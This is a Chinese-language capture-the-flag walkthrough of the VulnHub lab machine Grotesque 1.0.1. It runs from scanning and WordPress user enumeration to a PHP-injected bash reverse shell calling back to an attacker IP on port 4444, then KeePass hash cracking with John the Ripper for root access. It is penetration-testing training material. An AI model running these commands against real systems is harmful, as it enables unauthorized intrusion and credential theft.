靶机下载地址:Grotesque: 1.0.1 ~ VulnHub
进行渗透
一、 获取端口信息
nmap或者arp-scan都能扫除IP,这里就不赘述了。先看看开放了哪些端口。
<span style="color:#000000"><span style="background-color:#ffffff"><code class="language-css">nmap -O -sV -<span style="color:#0000ff">p</span>- -<span style="color:#0000ff">A</span> <span style="color:#880000">192.168</span>.<span style="color:#880000">10.9</span>
</code></span></span>
开放了66和80端口。
二、 寻找WEB漏洞
直接访问80端口,返回404,无法登录。
访问66端口,可正常访问。点击红框下载文件
解压后,在_vvmlist中有很多内容大致相同的文件,这里通过读取该路径下所有文件的内容,并去除重复行,得到80端口的路径
<span style="color:#000000"><span style="background-color:#ffffff"><code class="language-bash"><span style="color:#0000ff">cat</span> ./_vvmlist/* | <span style="color:#0000ff">sort</span> | <span style="color:#0000ff">uniq</span>
</code></span></span>sort:将输出内容排序
uniq:去除相同行
成功访问,并且可以看到CMS为WrodPress
扫描该路径
<span style="color:#000000"><span style="background-color:#ffffff"><code class="language-bash">dirsearch -u http://192.168.10.9/lyricsblog/
</code></span></span>其中wp-login.php是用户登录的文件。
WPScan是一款用于WordPress的扫描器,可以对用户等进行扫描。
<span style="color:#000000"><span style="background-color:#ffffff"><code class="language-bash">wpscan --url http://192.168.10.9/lyricsblog/ -e at -e ap -e u
</code></span></span>-e at:启用枚举插件(at 是 authors 的缩写)。它会列出目标网站上所有的作者信息。这对于发现可能存在的弱密码或错误配置的帐户很有用。
-e ap:启用枚举插件(ap 是 plugins 的缩写)。它会列出目标网站上使用的插件信息。通过这一步可以找到目标网站上是否存在已知的漏洞。
-e u:启用枚举插件(u 是 users 的缩写)。它会列出目标网站上的所有用户。这有助于发现是否有公开的管理员或其他用户账户,可能被用于后续的攻击。
得到用户名:erdalkomurcu
至于密码,简单来说就是根据歌词文件的MD5值得到的,脑洞比较大,可以看一下别的文章,这里就不赘述,直接给出密码:BC78C6AB38E114D6135409E44F7CDDA2
使用得到的用户和密码在wp-login.php进行登录。登录后写入反弹shell的语句。这里可以选择任意一个php文件写入,我选择写入index.php(在写入反弹shell语句之前,可以测试phpinfo()是否可以执行)
<span style="color:#000000"><span style="background-color:#ffffff"><code class="language-perl"><span style="color:#0000ff">system</span>(<span style="color:#a31515">"bash -c 'bash -i >& /dev/tcp/192.168.10.18/4444 0>&1'"</span>);
</code></span></span>
kali启动端口监听4444端口,访问 http://192.168.10.9/lyricsblog 即可反弹shell
<span style="color:#000000"><span style="background-color:#ffffff"><code class="language-yaml"><span style="color:#a31515">nc</span> <span style="color:#a31515">-nlvp</span> <span style="color:#880000">4444</span>
</code></span></span>
查看wp-config.php,看到用户raphael,密码为_double_trouble_
切换到/home目录下,看到存在用户raphael,尝试切换用户,成功登录
第一个flag就在/home/raphael/user.txt中
三、 提权
在/home/raphael/路径下还有隐藏文件chadroot.kdbx
知识点:kdbx文件是由软件KeePass导出的密钥文件,可以将所有的密码都加密存储在这个文件中。只需要一个主密钥,即可解密该密钥文件,得到所有密码。
keepass2john是一个辅助工具,它用于从 KeePass 数据库 (.kdbx) 文件中提取哈希值,以便 John the Ripper 进行破解。
john是 John the Ripper 的主程序,负责使用不同的破解策略(如字典攻击、暴力破解等)对提取的哈希值进行破解,以尝试恢复原始密码。
先将该文件传输到kali上,靶机启动简易传输服务
<span style="color:#000000"><span style="background-color:#ffffff"><code class="language-yaml"><span style="color:#a31515">python3</span> <span style="color:#a31515">-m</span> <span style="color:#a31515">http.server</span> <span style="color:#880000">8000</span>
</code></span></span>kali下载该文件
<span style="color:#000000"><span style="background-color:#ffffff"><code class="language-bash">wget 192.168.10.9:8000/.chadroot.kdbx
</code></span></span>提取哈希值,将哈希值写入文件hash.txt
<span style="color:#000000"><span style="background-color:#ffffff"><code class="language-python">keepass2john .chadroot.kdbx > <span style="color:#0000ff">hash</span>.txt
</code></span></span>指定字典破解密码(初次使用该字典需要解压: gzip -d /usr/share/wordlists/rockyou.txt.gz)
<span style="color:#000000"><span style="background-color:#ffffff"><code class="language-javascript">john --wordlist=<span style="color:#ab5656">/usr/</span>share/wordlists/rockyou.txt hash.txt
</code></span></span>
得到主密钥:chatter
登录网站:KeeWeb
选择打开kdbx文件,输入密钥chatter,即可得到所有密码
使用第三个密码,即可成功切换到root用户。密码为:.:.subjective.:.
第二个flag就在/root/root.txt